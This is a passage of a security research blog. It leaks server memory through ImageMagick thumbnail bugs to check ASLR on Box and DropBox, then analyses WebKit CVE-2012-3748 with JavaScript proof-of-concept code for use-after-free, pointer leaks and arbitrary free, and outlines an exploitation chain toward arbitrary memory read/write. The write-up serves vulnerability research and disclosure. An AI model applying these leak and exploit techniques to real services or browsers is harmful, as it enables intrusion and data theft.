compact_pixels: | 78 9c 01 ff ff 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? |

Treating this as the first 16 bytes of a zlib stream will decode to whatever is in those 9 bytes of uninitialized memory, as highlighted in red. We're back to exfiltrating raw bytes again, which is a win. (Note that the start of the output is at byte 7 into the heap chunk, which is not nicely 8 bytes aligned. This explains why the pointers in the dump below appear to be offset by 1 byte.)

There's one more quirk, though. This still isn't a valid zlib stream because it is truncated, both in terms of missing data and a missing final checksum. How will the ImageMagick PSD decoder handle this? The answer lies in looking at the exit condition for the zlib deflate loop. We see that it only cares that the output buffer was filled. It specifically does not care if the zlib API never declares that the decode ended. So again taking the hypothetical 16 byte compressed data buffer, the PSD code will stuff 16 bytes as input into the zlib input buffer. Let's further assume that the output channel is a 2x2 canvas, requiring 4 bytes to fill. This buffer and length is also passed to zlib as the ouput buffer and length. When zlib is called for the first time, it will have 9 bytes of actual output available, but emit only 4 of them because that's the size of the output buffer. And that's it. The PSD code will exit the the zlib decode loop and continue. (In case you are curious, a more typical zlib loop would consume the full zlib output buffer, then call into zlib again with a new output buffer to fill. It would also perhaps similarly check to see if the input buffer was fully drained.)

Here's the sample PSD exploit file: zip_uninit_read_128.psd.

I won't break this one down byte by byte because it's 133 bytes of file format glue to get to the ZIP attack surface.


Let's upload the PSD file to Box and then view the preview pane for the uploaded file and save the displayed PNG file. It results in an image like the one above. Extracting raw bytes is just a matter of an ImageMagick conversion command, although the Ubuntu 16.04 LTS ImageMagick appears to be buggy for certain greyscale images, so we'll use GraphicsMagick:

gm convert box_zip_uninit_128.png out.gray
od -t x1 out.gray

0000000 00 f8 81 bd 7b 18 7f 00 00 70 00 00 00 00 00 00
0000020 00 71 00 00 00 00 00 00 00 00 d1 d0 7d 18 7f 00 
0000040 00 78 81 bd 7b 18 7f 00 00 80 94 d0 7d 18 7f 00 
0000060 00 d0 ce d0 7d 18 7f 00 00 20 00 00 00 00 00 00
0000100 00 50 00 00 00 00 00 00 00 80 d1 d0 7d 18 7f 00 
0000120 00 31 00 00 00 00 00 00 00 78 81 bd 7b 18 7f 00 
0000140 00 80 cf d0 7d 18 7f 00 00 30 58 d1 7d 18 7f 00 
0000160 00 78 81 bd 7b 18 7f 00 00 90 00 00 00 00 00 00

In the above hex dump, all of the pointers are highlighted in green. All ten pointers are wholesome pointers indicating good ASLR, hence the green color. You can contrast this with some pointers in my previous post which clearly indicated that Box did not have ASLR on their binary.

Proving a result with a negative (the lack of a clearly dubious pointer) is not particularly scientific, but I'll note that I tried a variety of different upload image sizes in order to explore the content of recently freed heap chunks of a variety of different sizes. I also tried the upload of some files multiple different times and never saw a pointer indicating a lack of binary ASLR. When binary ASLR was indeed absent, the same tests readily indicated the fact.


The overall weight of evidence, split across two blog posts, suggests that Box did not previously have binary ASLR enabled, and they did indeed make a change and fix the issue after my report. We used an ImageMagick 0day (now 1day) to prove that ASLR was missing, and then a different ImageMagick 0day (still 0day today :) to prove that ASLR is now present. The loop is now satisfactorily closed.

Wednesday, May 10, 2017

Proving missing ASLR on and over the web for a $343 bounty :D


Cloud file storage providers such as Box and DropBox will typically thumbnail uploaded images for purposes of showing icons and previews. Predictably, both providers appear to use ImageMagick for thumbnailing. So what happens if we come knocking with the ImageMagick 1-day CESA-2017-0002?

CESA-2017-0002 is a vulnerability in the RLE image decoder, where the allocated render canvas memory is not initialized under some conditions. This leads to the server generated thumbnail and preview being based on uninitialized memory. The pixels of the resulting preview can be used to reconstruct chunks of server memory.

The vulnerability itself is not particularly complicated, and will be fully described in a future post that describes a scenario where it has more bite.

Sandboxing and isolation

This vulnerability has interesting interactions with sandboxes and process boundaries. While sandboxes can do wonders to mitigate vulnerabilities such as remote code execution and filesystem leaks, they do little for bugs that leak memory content, such as this one.

On the other hand, good use of process boundaries can help against bugs that leak memory content. In a one-process-per-thumbnail model, the virtual address space of the process is only going to contain the attacker's data, and likely not the private data of anyone else.

In the case of Box and DropBox, I've not seen any indications of leaking anyone else's private data. It's likely that they are both using a one-process-per-thumbnail model. Certainly, one "easy" way to integrate ImageMagick would be to use the convert binary to run individual image transform jobs. This would give a one-process-per-thumbnail model.

Trying to get a bounty

Let's face it, getting a bug bounty is kind of cool. Given that we don't think we can leak someone else's data, might there be anything else in the address space that we could leak that is worthy of a bounty? Unfortunately, most bounty programs exclude minor leaks such as precise versioning information or configuration details.

But one idea does occur to us: since we're leaking the content of free'd memory chunks, we're very likely to see pointer values for things like malloc() freelist entries. The specific values of these pointers will tell us what level of ASLR exists in the process. If the level of ASLR is anything other than "full ASLR", would that be worth a bounty? Maybe. Let's proceed to try and leak some pointer values.

Exfiltrating bytes of memory

To exfiltrate bytes of memory, we will upload a color RLE file of 16x8 dimensions and download the resulting PNG file from the file preview panel. For both Box and DropBox, the preview has the following useful traits:
  • Produces a PNG download. PNG is a lossless format, so the PNG pixel values should correspond exactly with raw memory bytes.
  • Leaves image dimensions alone for smaller image sizes. This is useful because any downscaling would result in information loss.
We choose a 16x8 file based on trial and error. The size of the input file determines what malloc() size is used for the canvas that is not initialized properly:

    pixels=(unsigned char *) GetVirtualMemoryBlob(pixel_info);

Different sizes here will result in the leak of different portions of the heap. 16x8 leads to a 512 byte allocation. Based purely upon testing rather than theory, this appears to be good size that reliably leaks pointer values. But if we make the size too large, perhaps in the greedy hope of leaking tons of data, we'll end up with our allocation getting placed at the end of the heap. Obviously, there won't be any previous content in a brand new allocation at the end of the heap, and we'd leak a bunch of 0 bytes, which is not particularly impressive.

Observed leaked bytes were fairly consistent across runs, lending further evidence that Box and DropBox might just be using the convert binary, which would have a fresh heap state on each operation. This also suggests that if we really wanted to, we could carefully control the allocations and deallocations that our input file performs, in order to get the heap into a specific state to control exactly what was leaked.

Here are two examples of leaked images:

On the left is Box and on the right DropBox. The images have been scaled to 800% original size for clarity. Right away, we can visually see that our empty input canvas has resulted in a non-empty output canvas: leaked memory content! In order to turn the original downloaded PNG into a more digestible format, we can convert it to raw bytes like this:

convert box_16_8_rgb_rle.png out.rgb

And the dumping the resulting out.rgb file (e.g. od -t x1), we can look for pointers. First, Box:

0000000 88 27 81 cf cd 7f 00 00 88 27 81 cf cd 7f 00 00
0000020 00 39 18 02 00 00 00 00 00 39 18 02 00 00 00 00
0000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000140 00 00 00 00 00 00 00 00 20 31 81 cf cd 7f 00 00
0000160 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00
0000200 00 00 00 00 00 00 00 00 f0 39 18 02 00 00 00 00

Bytes highlighted in orange appear to be pointers to "high" locations in x86_64 virtual memory, such as the first one, 0x00007fcdcf812788. In fact, that's probably a pointer into the glibc static BSS, for the head of one of the freelist buckets. Running the test again, we get the different value 0x00007efdaac7d788, but the lower 12 bits (i.e. page offset) are the same, at 0x788.

Bytes highlighted in red appear to be pointers to "low" locations in virtual memory, such as 0x00000000021839f0. Running the test again, we get 0x0000000001cc19f0.

For DropBox, we dump out the following values of interest, with the same rules for highlights, and similar results:

0000000 30 76 38 02 00 00 00 00 00 00 00 00 00 00 00 00
0000020 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00
0000040 00 00 00 00 00 00 00 00 00 07 2c c9 5a 7f 00 00
0000060 00 00 00 00 00 00 00 00 54 52 53 54 ff ff ff ff
0000100 70 00 00 00 00 00 00 00 50 00 00 00 00 00 00 00
0000120 70 75 38 02 00 00 00 00 00 00 00 00 00 00 00 00
0000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000220 00 00 00 00 00 00 00 00 61 02 00 00 00 00 00 00
0000240 d0 66 38 02 00 00 00 00 c0 75 38 02 00 00 00 00

ASLR determination

So, can we conclude what ASLR situation exists in the processes we dumped data from? Yes. At first glance, the ASLR may appear reasonable because all of the pointers are bouncing around between invocations. But there are at least 4 possible Linux ASLR setups that we should try and distinguish between. Here are some examples of these four setups for Linux x86_64:

1) Position independent executable, no system ASLR (/proc/sys/kernel/randomize_va_space)

555555554000-555555580000 r-xp 00000000 fc:01 659830                     /usr/bin/curl
55555577f000-555555782000 r--p 0002b000 fc:01 659830                     /usr/bin/curl
555555782000-555555783000 rw-p 0002e000 fc:01 659830                     /usr/bin/curl
555555783000-555556f4b000 rw-p 00000000 00:00 0                          [heap]

2) Position independent executable, and system ASLR

55809480d000-558094839000 r-xp 00000000 fc:01 659830                     /usr/bin/curl
558094a38000-558094a3b000 r--p 0002b000 fc:01 659830                     /usr/bin/curl
558094a3b000-558094a3c000 rw-p 0002e000 fc:01 659830                     /usr/bin/curl
558095533000-558096cfb000 rw-p 00000000 00:00 0                          [heap]

3) Statically positioned executable, no system ASLR

00400000-00401000 r-xp 00000000 fc:01 931015                             /usr/lib/x86_64-linux-gnu/ImageMagick-6.8.9/bin-Q16/display
00600000-00601000 r--p 00000000 fc:01 931015                             /usr/lib/x86_64-linux-gnu/ImageMagick-6.8.9/bin-Q16/display
00601000-00602000 rw-p 00001000 fc:01 931015                             /usr/lib/x86_64-linux-gnu/ImageMagick-6.8.9/bin-Q16/display
00602000-00692000 rw-p 00000000 00:00 0                                  [heap]

4) Statically positioned executable, and system ASLR

00400000-00401000 r-xp 00000000 fc:01 931015                             /usr/lib/x86_64-linux-gnu/ImageMagick-6.8.9/bin-Q16/display
00600000-00601000 r--p 00000000 fc:01 931015                             /usr/lib/x86_64-linux-gnu/ImageMagick-6.8.9/bin-Q16/display
00601000-00602000 rw-p 00001000 fc:01 931015                             /usr/lib/x86_64-linux-gnu/ImageMagick-6.8.9/bin-Q16/display
0242d000-024bd000 rw-p 00000000 00:00 0                                  [heap]

In both the Box and DropBox cases, the pointers we have leaked match case 4), statically positioned executable with system ASLR. We make this determination because the supposed heap pointers are low but slightly variable between runs.

Ergo, both Box and DropBox have a vulnerability: missing ASLR on the binary used to do the thumbnailing. Put another way, that binary was not compiled as position independent. It's not a particularly surprising vulnerability: my Ubuntu 16.04 install has the same problem:

file -L /usr/bin/convert
/usr/bin/convert: ELF 64-bit LSB executable, x86-64, version 1 (SYSV)

Box vs. DropBox

When the same vulnerability crops up in two different places, the opportunity arises to perform comparisons. Both Box and DropBox appeared to have a one-process-per-conversion model and both responded to the report promptly by performing the most important action, which was to firmly curtail the number of ImageMagick decoders on the attack surface. Further to my previous post about a likely ancient ImageMagick on Box, no evidence of ancient ImageMagick was found on DropBox.


Determining whether ASLR is correctly enabled or not on the server is usually opaque to web application security testing. But by finding a vector to leak the content of server memory, we can match up pointer values to the status of ASLR on the server.

For my trouble, DropBox awarded me a $343 bounty. Box does not have a bounty program at this time.

Lack of ASLR on the ImageMagick conversion process could be a useful foot in the door to a memory corruption attack. One-shot exploitation of image decoding is fairly hard, because you have to defeat ASLR and also land the corruption exploit within the context of a single image decode, where you typically don't have scripting available. If, however, the binary is at a fixed location due to missing ASLR, exploitation is a much more tractable problem.

Friday, May 5, 2017

Ode to the use-after-free: one vulnerable function, a thousand possibilities


This post explores an old but wonderful vulnerability that enables us to really showcase the (oft underestimated) power of the use-after-free vulnerability class.

We’re going to take a step back and consider the wider class of “use-after-invalidation”, of which use-after-free is one type of use of invalidated state. We will see one single area of vulnerable code that has it all: use-after-invalidation leading to out of bounds reads and writes; use-after-free leading to object aliasing; use-after-free leading to information leakage and more. It’s hard to imagine a better real vulnerability exists for the study of this area.

We’ll dive into all the different side effects a use-after-free can have, and -- of course!! -- get to the stage of working and highly reliable exploits.

Introducing CVE-2012-3748

CVE-2012-3748 has a very storied history. It originally acquired public fame when used in Mobile Pwn2Own to pwn an iPhone 4S (Sep 2012), getting assigned ZDI-13-009. The eventual Apple advisory is here (Feb 2013).

A public exploit may be found here on Packet Storm (Sep 2013). It’s worth noting that the author is Vitaliy Toropov, a hacker who later found infamy when he was outed as a supplier to Hacking Team. (The Hacking Team Flash bug was similar: memory corruption resulting from unexpected state changes in a script callback.)

And as one commentator notes on a thread discussing a port of this vulnerability to the PlayStation 4, “That one WebKit bug is the gift that keeps on giving” (Oct 2014).

In general, everyone ships an out of date WebKit and Linux distributions are no different. So it wasn’t really a surprise to me to look at an old but still supported Linux distribution, Ubuntu 12.04 LTS, and find the same vulnerability present. To explore this vulnerability, I’m using 32-bit and 64-bit versions of fully patched Ubuntu 12.04 LTS, and the WebKit backend for the Konqueror browser.
[Note: since starting to write this post, Ubuntu 12.04 LTS has passed end of life.]
For what it’s worth, the woeful state of WebKit packaging on Linux was discussed in Feb 2016 in this blog post, which was picked up by Linux Weekly News.

The vulnerability

The vulnerability is a range of issues leading to memory corruption in the C++ code backing the Array.sort() JavaScript API. The manifestation of the vulnerability changed over its lifetime as various code changes and optimizations were made. The 2013 exploit is based on this version of the JSArray.cpp C++ file:

We won’t dwell on this one for long because this behaves differently to our Ubuntu version. But briefly:

void JSArray::sort(ExecState* exec, JSValue compareFunction, CallType callType, const CallData& callData)
[1]    unsigned usedVectorLength = min(m_storage->m_length, m_vectorLength);
[2]    for (; numDefined < usedVectorLength; ++numDefined) {
          JSValue v = m_storage->m_vector[numDefined].get();
          if (!v || v.isUndefined())
          tree.abstractor().m_nodes[numDefined].value = v;
[3]        tree.insert(numDefined);
      for (unsigned i = 0; i < numDefined; ++i) {
[4]        m_storage->m_vector[i].set(globalData, this,

For the purposes of discussion, let’s assume that we have a JavaScript Array of length 2, containing the values 0, 0. At [1] above, the used Array size is 2. At [2], the loop will iterate twice, locating the two defined values and eventually leaving the loop with numDefined being set to 2. [3] is where the problems occur: inserting into the sort tree causes a callback into JavaScript and this callback can mess with the Array that we’re currently sorting. If our callback specifically calls Array.shift(), we’ll get some fireworks. Shifting the Array essentially removes the first element and internally this is accomplished by bumping the m_storage pointer along one element (8 bytes), and reducing the size by one. At [4], the code still believes the Array has length two, so will iterate twice and write two sorted values. However, the write will start at an m_storage pointer that was bumped along by one element. This is an out-of-bounds write, aka. buffer overflow! You might wonder if it’s possible to just make the array smaller via more conventional means such as Array.pop(), and achieve similar results. As it happens, the code is very reluctant to reallocate the backing store to a smaller size so the Array.shift() exploitation path is the only obvious one.

Anyway, we are targeting the vulnerability as it exists in Konqueror in our Ubuntu install. Konqueror is the KDE web browser and its WebKit backend uses QtWebKit, specifically version 2.2.1, which appears to be close to JSArray.cpp@r88503. Let’s have a look at that:

void JSArray::sort(ExecState* exec, JSValue compareFunction, CallType callType, const CallData& callData)
[1]    ArrayStorage* storage = m_storage;
      unsigned usedVectorLength = min(storage->m_length, m_vectorLength);
      unsigned nodeCount = usedVectorLength + (storage->m_sparseValueMap ?
                                               storage->m_sparseValueMap->size() : 0);
[2]    tree.abstractor().m_nodes.grow(nodeCount);
      unsigned numDefined = 0;
      unsigned numUndefined = 0;
      for (; numDefined < usedVectorLength; ++numDefined) {
[3]        JSValue v = storage->m_vector[numDefined].get();
          if (!v || v.isUndefined())
          tree.abstractor().m_nodes[numDefined].value = v;
[4]        tree.insert(numDefined);
      unsigned newUsedVectorLength = numDefined + numUndefined;

[5]    if (SparseArrayValueMap* map = storage->m_sparseValueMap) {
          newUsedVectorLength += map->size();
          if (newUsedVectorLength > m_vectorLength) {
              // Check that it is possible to allocate an array large enough to
                 hold all the entries.
              if ((newUsedVectorLength > MAX_STORAGE_VECTOR_LENGTH) ||
                  !increaseVectorLength(newUsedVectorLength)) {
[6]        storage = m_storage;

[7]        SparseArrayValueMap::iterator end = map->end();
          for (SparseArrayValueMap::iterator it = map->begin(); it != end; ++it) {
[8]            tree.abstractor().m_nodes[numDefined].value = it->second.get();
[9]            tree.insert(numDefined);

[10]       delete map;
[11]       storage->m_sparseValueMap = 0;
      for (unsigned i = 0; i < numDefined; ++i) {
[12]       storage->m_vector[i].set(globalData, this,
[13]   storage->m_numValuesInVector = newUsedVectorLength;

There’s a lot going on here, but in an attempt to make sense of the possibilities, there is a color code:
  • Yellow for places where the code caches some value or decision that could be invalidated in a JavaScript callback.
  • Orange for places where a JavaScript callback can occur.
  • Red for places where the results of invalidated values or decisions can cause corruptions.

Most of the problems occur because the storage pointer is cached as a stack local variable at [1], but the memory allocation for the actual Array storage can get moved during the JavaScript sort callback at [4] and [9], if for example the Array is shifted or expanded. Direct fallout is at [3], [5], [11], [12], [13] with a significant secondary fallout at [10] that we’ll cover later.

Another problem occurs because the length of the sort node allocation at [2] can become invalid, with buffer overflow resulting at [8] if the attacker does things in the right order. This is an interesting use-after-invalidation leading to out-of-bounds write. This post will concentrate on the use-after-free opportunities but still, it’s interesting to see a single vulnerable area lead to side a wide range of side effects and different vulnerability classes.

The final problem of note occurs because the end iterator of a map is taken at [7] but the map itself could be changed (have keys added or removed) in the callback at [9], which may invalidate any existing iterators.

Invalidation options and allocator considerations

To continue exploring the effects of these vulnerabilities, and how they might lead to exploitation, we need to understand our exact invalidation options and also how the allocator affects matters.

By invalidation options, we’re talking about what exactly to do inside the JavaScript callback to change the state of the Array mid-sort. Here is what we can do:

  • Add more elements to the dense end of a dense Array. A dense Array is one which has high density of elements, which includes any Array where all of the elements are set in sequence from index 0. By adding more elements to the end of a dense Array, it will need to expand its internal storage, which results in a reallocation. This reallocation can invalidate the storage pointer in the code above.
  • Remove elements from the end of a dense Array. You might assume that shrinking a dense array would also cause a reallocation, down to a smaller size. Strangely, I was not able to see a code path that achieves this. This implies that either I missed something, or that the code is wasteful when an Array grows large and is then shrunk back down. At any rate, this avenue is not explored.
  • Add more sparse elements to an Array. An Array stores sparse elements when it believes the Array is not dense, or when a wildly high Array index is used. Adding sparse elements to an Array can cause the reallocation of the HashMap buffer that maps sparse keys to element values.
  • Shift or unshift an Array. Shifting or unshifting an Array is where new elements are chopped off or added to the front of the Array. The implementation of this is interesting. Because the underlying data structure is an array, as opposed to a linked list or double ended queue, adding or removing elements from the front involves copying all the existing elements around. Or does it? There’s actually a little optimization trick used where the C++ header object is copied around instead of the elements! This is shown pictorially and explored below.

The allocator used has a bearing on how the various invalidations above behave. Looking in JSArray.cpp, we see the Array storage is allocated like this (example from one of the constructors):

   m_storage = static_cast(fastMalloc(storageSize(initialCapacity)));

fastMalloc is in fact WTF::fastMalloc() which is itself based on a built-in copy of the tcmalloc allocator. tcmalloc is a strictly bucketing allocator for smaller sizes, with last-in, first-out semantics for a given bucket size. The consequences of this include:

  • The use of fastMalloc() is explicit in the code base. Any allocations not explicitly using this API will use the system allocator. So when we are targeting objects types for buffer overflow or use-after-free overlap, we’ll need to stick to object types that are explicitly using fastMalloc().
  • If we want to exploit a use-after-free, we have good reliable opportunities. If the freed object is e.g. 128 bytes in size, then the next 128 byte allocation will be placed in the freed slot.

Let’s look at some specific JavaScript proof of concept code for some of the problems:

Situation #1: invalidated size leading to out-of-bounds write

This is an interesting situation, but not one we’ll use for any of our exploits, so let’s get it out of the way:

var myCompFunc = function(x,y)
 if (!sort_iters) {
   alert("sorting: " + x + " and " + y);
   for (i = 0; i < 256; ++i) {
     a1[0x80000000 + i] = i;
 return 0;

sort_iters = 0;
a1 = [1,2];

This code starts with a dense Array, a1, of length 2. This will result in a Vector buffer allocation of size 2 at point [2] in the C++ code. As the element values 1 and 2 are compared in the first sort iteration, the JavaScript callback adds lots of elements to the Array that will go into the sparse map because the indexes are very large. Later, at point [8] in the C++ code, the sparse map will be iterated and all of the elements will be added to the Vector buffer allocated earlier. But, the sparse map contains 256 elements and the Vector buffer is only 2 elements large. The Vector buffer contains some slop space due to a default minimum capacity of 16, but 256 elements is enough to fill the slop space and smash some adjacent allocation. On 64-bit, the eventual crash looks like:

#0  WebCore::RenderBoxModelObject::paintBoxShadow()
cmp 0x18(%rbx),%ebp

Since this is a linear buffer overflow, heap spraying would be needed to place an interesting chunk in the area of corruption. Heap spraying is usually probabilistic instead of deterministic, so is disfavored for highly reliable exploits. We’ll see below how use-after-invalidation vulnerabilities can offer significantly greater reliability.

Situation #2: invalidated shifted read pointer leading to information leak

var myCompFunc = function(x,y)
 if (x) {
   dv.setFloat64(0, x, true);
   alert('leaked: 0x' + dv.getUint32(0, true).toString(16));
 if (y) {
   dv.setFloat64(0, y, true);
   alert('leaked: 0x' + dv.getUint32(0, true).toString(16));
 if (!sort_iters) {
   a1.splice(0, 4);
 return 0;

dv = new DataView(new ArrayBuffer(8));
sort_iters = 0;
a1 = [0,0,0,0,0];

If you run this in 32-bit Konqueror, it’ll output something like: “leaked: 0xad9955c0”. If you run it in 64-bit Konqueror, it will crash. We’ll get to that later as it complicates our 64-bit exploit. To focus on why this works on 32-bit, let’s use a diagram:

In the above diagram, we see how the exact same single fastMalloc() chunk will look before and after the Array.splice operation. The same allocation, contains both a C++ object header (24 bytes on 32-bit) as well as the actual variable length of Array elements, which are all 8 bytes each in order to accommodate a double floating point value if necessary. The C++ object header, a JSC::ArrayStorage, is colored yellow. Element storage is colored green. The object member labelled ptr is actually JSC::ArrayStorage::m_allocBase, a pointer to the beginning of the fastMalloc() chunk, and it is this useful value that we leak.

The leak occurs because the chunk of memory to iterate for the sort, shown in orange above, is fixed at the beginning of the sort. However, the splice operation is called in the middle of the sort, in the JavaScript sort callback, when elements 0 and 1 are being compared. The splice shifts the C++ object header along into the predetermined (and now invalid!) iteration range. When elements 2, 3 are read, the reads actually read the values of the JSC::ArrayStorage object. These values will be treated as doubles but luckily the DataView JavaScript class can convert a double into raw bytes for extraction of the pointer.

This is an exceptionally reliable primitive -- likely deterministic, because no allocator churn is involved. This is more of a use-after-invalidation than a use-after-free because nothing is actually freed. No out-of-bounds access relative to a heap chunk occurs either.

Finally, we should note that this primitive isn’t just a use-after-invalidation read, it’s also a use-after-invalidation write because if the sort changes the ordering of the elements, the JSC::ArrayStorage object will be corrupted. There are a large number of possibilities here that remain unexplored.

Situation #3: invalidated write pointer leading to use-after-free write

buf = null;
var myCompFunc = function(x,y)
 a1[2] = 0x41;
 buf = new ArrayBuffer(56);
 return 0;

a1 = [1,2];
a1[0] = a1;
a1[1] = a1;
u32buf = new Uint32Array(buf);

If we run this on 64-bit, our alerts will come out something like: 2; 9c04c290; 7fbd.

The situation we cause here is simple but powerful. First, a dense 2 element Array is created. This is a 40 byte header plus 2x 8 byte elements on 64-bit, for a total of a a 56 byte allocation. During the sort JavaScript callback, the Array is expanded such that it no longer fits inside the 56 byte allocation. A new allocation is made, the current contents are copied, and the old allocation is freed. The vulnerability is that the storage pointer cached at [1] in the C++ code becomes invalid and using it at [12] and [13] is a use-after-free write.

What will the use-after-free trample over? Because of the bucketing and LIFO nature of the allocator, the attacker gets to choose the object that occupies the recently freed slot simply by causing an allocation of the same size. In the JavaScript above, we just allocate a 56 byte ArrayBuffer backing buffer. As luck would have it, ArrayBuffer backing buffers are also allocated with fastMalloc() so we’re set. The use-after-free tramples over our nice pristine zero filled buffer. The number of elements in the sorted Array is written, which is the value 2 as seen in the alerts. The Array elements are also written, which we have chosen to be JavaScript objects in this case. That gives us another useful information leak, telling us where in virtual memory any JavaScript object resides.

As in most of these situations, there remain many unexplored avenues in the tree of possibilities:

  • The use-after-free isn’t just a write primitive. It can also be a read primitive. By allocating any object in the freed slot, the in-progress sort will start reading elements from there instead. This makes for a fairly arbitrary information leak.
  • The use-after-free write was only used here to corrupt an object which is “harmless” to corrupt, i.e. there will be no side effects from corrupting an ArrayBuffer buffer other than leaking information. We could instead explore the side effects accessible from corrupting any other 56 byte (or arbitrary size) object. As an example of a concrete question we could ask: what is the side effect of corrupting each and every possible 56 byte fastMalloc() allocated object, such that the 4 bytes at offset 4 are set to the value “2” (or any other small integer)?

Situation #4: invalidated pointer to map leading to use-after-free read leading to arbitrary free

var myCompFunc = function(x,y)
 a1[2] = 0x41;
 buf = new ArrayBuffer(56);
 u32buf = new Uint32Array(buf);
 u32buf[2] = 0x41414141;
 return 0;

a1 = [1,2];

On 64-bit, this leads to:

Program received signal SIGSEGV
JSC::JSArray::sort (...)
mov 0x10(%rax),%edx
$rax = 0x41414141

As you will appreciate, that’s pretty serious looking. And such a simple JavaScript file. What happened? This is in fact a pretty similar use-after-free to situation #3. It starts off identically, object sizes and all. However, instead of creating and leaving a zero filled ArrayBuffer buffer in the freed slot, we set a few of the zeros to the byte value 0x41, at offset 8. Offset 8 corresponds to the object member JSC::ArrayStorage::m_sparseValueMap. This member is loaded through a stale storage pointer at [5] in the C++ code. This is a use-after-free read with bad pointer dereference as the immediate side effect. The crash occurred trying to load map->size(), with map being a nonsense pointer value of 0x41414141. If we had used a valid pointer value instead, we’d maybe iterate over some map keys and then call delete on whatever the valid pointer was, at [10]. The ability to free arbitrary pointers is pretty powerful and could lead to tertiary side effects such as use-after-free like situations of more arbitrary object types.

The reliability of this attack is very high. It’s almost deterministic because the allocator behavior for handing out memory chunks is deterministic, and the attacker controls the exact order of allocations and frees from JavaScript. However, for completeness, we should note that we haven’t fully analyzed the situation with regards threading and timers. These are questions we would need to answer if trying to make a truly 100% reliable exploit:

  • What happens if a timer fires right in between the free and the allocation for the use-after-free? Are there situations where running JavaScript can get pre-empted in this critical spot? What is the process, threading and pre-emption model when multiple different tabs, windows and websites are running in the same browser?
  • What about threads? Although the allocator has a per-thread cache, what if the free happens to release the last object held in a page range, and another thread triggers page reclaim right at this inopportune time?

Proceeding with exploitation: 64-bit

Now that we’ve enumerated various different use-after-invalidation possibilities, it’s time to consider chaining some of them together to try and get a reliable exploit working. We will start with 64-bit just because.

The number of different side effects we have to play with, as partially enumerated above, is large and possibly even a little overwhelming. If we consider secondary and tertiary etc. side effects that are possible, we’re into a blossoming tree of weird machine explorations! As always, though, one key to reliable exploitation is to try and keep things as simple as possible. So we’re going to try and rewire objects to get to a stage where we can cleanly read and write arbitrary locations in the virtual address space. The typical way of doing this is to gain control of a Uint8Array object or Uint32Array, etc.

After a bit of consideration, we’re going to do this by:

  1. Using our information leak primitive to learn where a buffer of a given size is.
  2. Use our arbitrary free primitive on that buffer of the given size.
  3. Immediately allocate a new object of the given size, to go into the freed slot.
  4. If necessary, repeat 2 and 3 one more time, to locate two arbitrary types of object at the same address.
  5. Now, we have a nice aliasing situation where live pointers exist to two different object types.

By chaining together the primitives we already have, we’ve gained a new powerful primitive: arbitrary object aliasing!

But before we can get all excited and use this primitive, we need to resolve an important issue: going back to primitive #2 above, the ability to leak the address of an ArrayStorage object, we see that it crashed on 64-bits :( Why is this? The answer is in the way JavaScriptCore internally represents JavaScript values. They are 8 byte values on both 32-bit and 64-bit, and can variously represent JavaScript numbers (doubles), boolean values, undefined values, null values and also arbitrary JavaScript objects. The way these different types are encoded differs between 32-bit and 64-bit, hence the difference in behavior. Of interest is when an 8 byte value is considered a JavaScript object -- termed a cell -- instead of a simple type like a number. Extracted and summarized from JSValueInlineMethods.h:

#if USE(JSVALUE32_64)
// (This is the 32 bits case)
  inline bool JSValue::isCell() const
       return tag() == CellTag;
// (This is the 64 bits case)
  inline bool JSValue::isCell() const
       return !(u.asInt64 & TagMask);

Where tag() returns the latter 4 bytes of the value, CellTag==0xfffffffb and TagMask==0xffff000000000002. Decoding all of this, the format of a cell pointer on 32-bit will be the actual 32-bit cell pointer followed by 0xfffffffb. On 64-bit, it will simply be the actual raw pointer itself (the tag mask selects for x86_64 style 48-bit pointers, with a partial alignment constraint). Aha! So this means that on 64-bit, as we’re trying to use and leak our real pointer to the ArrayStorage object, it will get interpreted as a JavaScript cell pointer and obviously that is not going to end well. On 32-bit, any pointer value we want to leak will work fine unless it is followed in memory by the 4 byte value 0xfffffffb. Looking at the full ArrayStorage structure:

  struct ArrayStorage {
       unsigned m_length; // The "length" property on the array
       unsigned m_numValuesInVector;
       SparseArrayValueMap* m_sparseValueMap;
       void* subclassData; // A JSArray subclass can use this to fill the vector
       void* m_allocBase; // Pointer to base address returned by malloc().
                             Keeping this pointer does eliminate false positives
                             from the leak detector.
       size_t reportedMapCapacity;

The pointer we leak is m_allocBase, and it is 8-byte aligned and followed by the reportedMapCapacity member, which is unlikely to ever set to 0xfffffffb, even if we tried. So for 32-bit, we will always treat the leaked pointer as the first 4 bytes of a double value, which can be cleanly converted to raw bytes, best I know. Although, interested readers should read Natalie Silvanovich’s Project Zero post where she had trials and tribulations with floating pointer SNaN quirks.
But on 64-bit, we really want to leak a real pointer value. It’s a headache that attempting the leak creates a JavaScript reference that causes a crash when used. In order to solve this issue, we can actually resort to combining situation #2 and situation #3 above. The full sequence is:

  1. Create an Array and sort it.
  2. On the first sort JavaScript callback, splice the Array so that the sort iteration will treat the ArrayStorage header fields as elements within the Array to sort.
  3. Under no circumstances use either of the JavaScript references passed to the sort callback, because the references based on the raw pointers in the ArrayStorage header will explode if touched in any way.
  4. On the final sort JavaScript callback, expand the Array, causing a reallocation and then use the resulting use-after-free to write the sorted Array elements into a freshly allocated ArrayBuffer buffer.
  5. The sorted elements will include the raw pointers from the ArrayStorage headers and these can now be safely read from the ArrayBuffer buffer that was written to on account of the use-after-free.

Ok. Now that we’ve fixed our information leak primitive on 64-bit, our object aliasing primitive that depends on it will now work. Let’s describe the full exploitation sequence:

  1. Alias a 112 byte ArrayBuffer buffer with a 112 byte WebCore::ScriptRunner object (which is allocated in the fastMalloc() heap when you create a new document from JavaScript).
  2. Read a timer related function pointer value from the WebCore::ScriptRunner. This gives us the address of everything in
  3. Alias a 2088 byte ArrayBuffer buffer with a 2088 byte ArrayStorage with 256 elements.
  4. Writing through the ArrayBuffer buffer, set element[0] to be an object pointer. Point it at element[1] in the Array, which is a memory scratch space we will use to fake a JSUint8Array object.
  5. Fake the JSUint8Array object. To be functional, we need to fill in bytes 0-7 (with the vtable for JSUint8Array), and bytes 48-55 (with a pointer to the Uint8Array object). Point this latter pointer to element[8] in the Array, which is a memory scratch space we will use to fake a Uint8Array object.
  6. Fake the Uint8Array object. To be functional, we need to fill in bytes 16-23 to point to the buffer storage we want. We point this to the BSS section. And we need to set bytes 40-43 to the desired buffer length. We max it out at 0xffffffff.
